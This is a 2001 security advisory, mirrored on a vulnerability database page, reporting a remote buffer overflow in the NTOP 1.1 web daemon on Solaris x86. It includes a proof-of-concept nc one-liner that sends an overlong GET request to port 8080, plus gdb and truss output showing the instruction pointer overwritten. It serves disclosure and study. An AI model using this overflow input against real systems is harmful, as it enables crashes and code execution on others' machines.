Lucene search
K

alt3kx-advisories-2001-002.txt

🗓️ 25 Aug 2001 00:00:00Reported by Alt3kxType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 45 Views

Remote buffer overflow in NTOP on Solaris_x86 allows privilege escalation via port 8080.

Code
`======================================================================  
  
Remote Buffer Overflow Under Solaris_x86  
NTOP - NEtwork Monitor vulnerable to compromise the system  
  
  
  
Author: alt3kx! <alt3kx@@raza-mexicana.org>  
Alternative: <[email protected]>  
Date: 2001-05-23  
Site: www.raza-mexicana.org  
  
  
Greet to: _0x90_, Dex, PaTa , Rebel and S0r from AR & Spain  
Teams: Raregazz - X-ploit and S0d  
  
  
in special to White-B  
  
======================================================================  
------------------------=[Brief Description]=-------------------------  
  
Exist the buffer overflow around 300 characteres, when u sending to  
port running the daemon, in this caseis port 8080 the users can  
execute code malicious to obtain high privilegies.  
  
  
--------------------------=[Plataforms]=--------------------------  
  
  
Sun Solaris 7.0_x86  
Sun Solaris 2.6_x86  
  
  
---------------------------=[Summary]=----------------------------  
  
  
Proof of concept :  
  
# ls -la /opt/ntop/bin/ntop  
-rwsr-xr-x 1 bin bin 249680 May 3 1999 /opt/ntop/bin/ntop  
#  
  
  
One step  
  
Run ntop as root the daemon  
  
# /opt/ntop/bin/ntop -w 8080  
ntop v.1.1 MT [i386-pc-solaris2.7] listening on elxl0.  
Copyright 1998-99 by Luca Deri <[email protected]>  
Warning: unable to read file '.ntop'. No security will be used!  
Waiting for HTTP connections on port 8080...  
[66] [42] 00:80:24:5A:CB:B7 sap 42 > 01:80:C2:00:00:00  
[66] [42] 00:80:24:5A:CB:B7 sap 42 > 01:80:C2:00:00:00  
[66] [42] 00:80:24:5A:CB:B7 sap 42 > 01:80:C2:00:00:00  
[66] [42] 00:80:24:5A:CB:B7 sap 42 > 01:80:C2:00:00:00  
[66] [42] 00:80:24:5A:CB:B7 sap 42 > 01:80:C2:00:00:00  
[66] [42] 00:80:24:5A:CB:B7 sap 42 > 01:80:C2:00:00:00  
.  
.  
.  
.  
.  
  
  
  
Two step:  
  
Run the next script as user normal:  
  
  
[local]:alt3kx# printf "GET /`perl -e 'print "A"x245'`\r\n\r\n" |nc   
localhost 8080  
HTTP/1.0 200 OK  
Server: ntop/1.1 (i386-pc-solaris2.7)  
Content-type: text/html  
  
<HTML>  
<HEAD>  
<META HTTP-EQUIV=REFRESH CONTENT=120>  
</HEAD>  
<BODY BGCOLOR=#FFFFFF>  
<P><H1><FONT FACE=Helvetica>Unable to find information related to   
host<i>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>  
</HEAD>  
<BODY BGCOLOR=#FFFFFF>  
FRESH   
CONTENT=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</i></FONT></H1>  
</CENTER>  
  
</CENTER><hr><FONT FACE=Helvetica><H5>Generated by <A   
HREF="http://www-serra.unipi.it/~ntop/">ntop</A> v.1.1 MT   
[i386-pc-solaris2.7] listening on elxl0<br>  
<address>&copy; 1998-99 by <A HREF=mailto:[email protected]>L.   
Deri</A></H5></font></BODY></HTML>  
[local]:alt3kx#  
  
SUCKS!!! NOT FUNCTIONALitY, AGAIN with more A´s :-)  
  
  
  
[local]:alt3kx# printf "GET /`perl -e 'print "A"x246'`\r\n\r\n" |nc   
localhost 8080  
[local]:alt3kx#  
  
  
  
  
Another shell u can see this  
  
# /opt/ntop/bin/ntop -w 8080  
ntop v.1.1 MT [i386-pc-solaris2.7] listening on elxl0.  
Copyright 1998-99 by Luca Deri <[email protected]>  
Warning: unable to read file '.ntop'. No security will be used!  
Waiting for HTTP connections on port 8080...  
[66] [42] 00:80:24:5A:CB:B7 sap 42 > 01:80:C2:00:00:00  
[66] [42] 00:80:24:5A:CB:B7 sap 42 > 01:80:C2:00:00:00  
[66] [42] 00:80:24:5A:CB:B7 sap 42 > 01:80:C2:00:00:00  
[66] [42] 00:80:24:5A:CB:B7 sap 42 > 01:80:C2:00:00:00  
[66] [42] 00:80:24:5A:CB:B7 sap 42 > 01:80:C2:00:00:00  
[66] [42] 00:80:24:5A:CB:B7 sap 42 > 01:80:C2:00:00:00  
Segmentation Fault(coredump)  
#  
  
[local]:alt3kx# gdb ntop --core=core  
GNU gdb 4.17  
Copyright 1998 Free Software Foundation, Inc.  
GDB is free software, covered by the GNU General Public License, and you are  
welcome to change it and/or distribute copies of it under certain   
conditions.  
Type "show copying" to see the conditions.  
There is absolutely no warranty for GDB. Type "show warranty" for details.  
This GDB was configured as "i386-pc-solaris2.7"...  
Core was generated by `ntop'.  
Program terminated with signal 11, Segmentation Fault.  
Reading symbols from /lib/libsocket.so.1...done.  
Reading symbols from /lib/libnsl.so.1...done.  
Reading symbols from /lib/libgen.so.1...done.  
Reading symbols from /lib/libc.so.1...done.  
Reading symbols from /lib/libdl.so.1...done.  
Reading symbols from /lib/libmp.so.2...done.  
#0 0x41414141 in ?? ()  
  
(gdb) info all-registers  
eax 0x1 1  
ecx 0xdffe19c8 -536995384  
edx 0x20a 522  
ebx 0x80cef44 135065412  
esp 0x8046f14 0x8046f14  
ebp 0x41414141 0x41414141  
esi 0xc8 200  
edi 0x80980f5 134840565  
eip 0x41414141 0x41414141  
eflags 0x10206 66054  
cs 0x17 23  
ss 0x1f 31  
ds 0x1f 31  
es 0x1f 31  
fs 0x0 0  
gs 0x0 0  
(gdb)  
  
  
[local]:alt3kx# truss /opt/ntop/bin/ntop  
  
  
  
open("/dev/zero", O_RDONLY) = 3  
mmap(0x00000000, 4096, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE, 3, 0) =   
0xDFFE1000  
sysconfig(_CONFIG_PAGESIZE) = 4096  
open("./libsocket.so.1", O_RDONLY) Err#2 ENOENT  
open("/lib/libsocket.so.1", O_RDONLY) = 4  
fxstat(2, 4, 0x08047138) = 0  
mmap(0x00000000, 4096, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) = 0xDFFDF000  
mmap(0x00000000, 40960, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) = 0xDFFD4000  
mmap(0xDFFDC000, 5712, PROT_READ|PROT_WRITE|PROT_EXEC,   
MAP_PRIVATE|MAP_FIXED, 4, 28672) = 0xDFFDC000  
close(4) = 0  
  
open("./libnsl.so.1", O_RDONLY) Err#2 ENOENT  
open("/lib/libnsl.so.1", O_RDONLY) = 4  
fxstat(2, 4, 0x08047138) = 0  
mmap(0xDFFDF000, 4096, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 4, 0) =   
0xDFFDF000  
mmap(0x00000000, 503808, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) =   
0xDFF58000  
mmap(0xDFFC5000, 23248, PROT_READ|PROT_WRITE|PROT_EXEC,   
MAP_PRIVATE|MAP_FIXED, 4, 442368) = 0xDFFC5000  
mmap(0xDFFCB000, 29472, PROT_READ|PROT_WRITE|PROT_EXEC,   
MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xDFFCB000  
close(4) = 0  
open("./libgen.so.1", O_RDONLY) Err#2 ENOENT  
open("/lib/libgen.so.1", O_RDONLY) = 4  
fxstat(2, 4, 0x08047138) = 0  
mmap(0xDFFDF000, 4096, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 4, 0) =   
0xDFFDF000  
mmap(0x00000000, 32768, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) = 0xDFF4F000  
mmap(0xDFF55000, 4184, PROT_READ|PROT_WRITE|PROT_EXEC,   
MAP_PRIVATE|MAP_FIXED, 4, 20480) = 0xDFF55000  
close(4) = 0  
open("./libc.so.1", O_RDONLY) Err#2 ENOENT  
open("/lib/libc.so.1", O_RDONLY) = 4  
fxstat(2, 4, 0x08047138) = 0  
mmap(0xDFFDF000, 4096, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 4, 0) =   
0xDFFDF000  
mmap(0x00000000, 593920, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) =   
0xDFEBD000  
mmap(0xDFF46000, 25448, PROT_READ|PROT_WRITE|PROT_EXEC,   
MAP_PRIVATE|MAP_FIXED, 4, 557056) = 0xDFF46000  
mmap(0xDFF4D000, 3316, PROT_READ|PROT_WRITE|PROT_EXEC,   
MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xDFF4D000  
close(4) = 0  
open("./libdl.so.1", O_RDONLY) Err#2 ENOENT  
open("/lib/libdl.so.1", O_RDONLY) = 4  
fxstat(2, 4, 0x08047138) = 0  
mmap(0xDFFDF000, 4096, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 4, 0) =   
0xDFFDF000  
close(4) = 0  
open("./libmp.so.2", O_RDONLY) Err#2 ENOENT  
open("/lib/libmp.so.2", O_RDONLY) = 4  
fxstat(2, 4, 0x08047138) = 0  
mmap(0x00000000, 4096, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) = 0xDFEBB000  
mmap(0x00000000, 16384, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) = 0xDFEB6000  
mmap(0xDFEB9000, 2524, PROT_READ|PROT_WRITE|PROT_EXEC,   
MAP_PRIVATE|MAP_FIXED, 4, 8192) = 0xDFEB9000  
mmap(0x00000000, 4096, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE, 3, 0) =   
0xDFEB4000  
close(4) = 0  
close(3) = 0  
  
  
[...............]  
  
  
door_info(3, 0x08044528) = 0  
door_call(3, 0x08044510) = 0  
door_info(3, 0x080465E0) = 0  
door_call(3, 0x080465C8) = 0  
door_info(3, 0x080465E0) = 0  
door_call(3, 0x080465C8) = 0  
door_info(3, 0x080465E0) = 0  
door_call(3, 0x080465C8) = 0  
Incurred fault #6, FLTBOUNDS %pc = 0x41414141  
siginfo: SIGSEGV SEGV_MAPERR addr=0x41414141  
Received signal #11, SIGSEGV [default]  
siginfo: SIGSEGV SEGV_MAPERR addr=0x41414141  
*** process killed ***  
  
  
  
bug discovered by alt3kx! <[email protected]> &   
<[email protected]>  
  
  
Possible C0de cooming soon .... je :-)  
  
  
---------------------------=[PATCH]=-----------------------------  
  
Download the last packages from Sun Microsystems  
  
-------------------------=[Company Compromise]=-------------------  
  
http://www.sun.com  
http://www.ntop.org  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation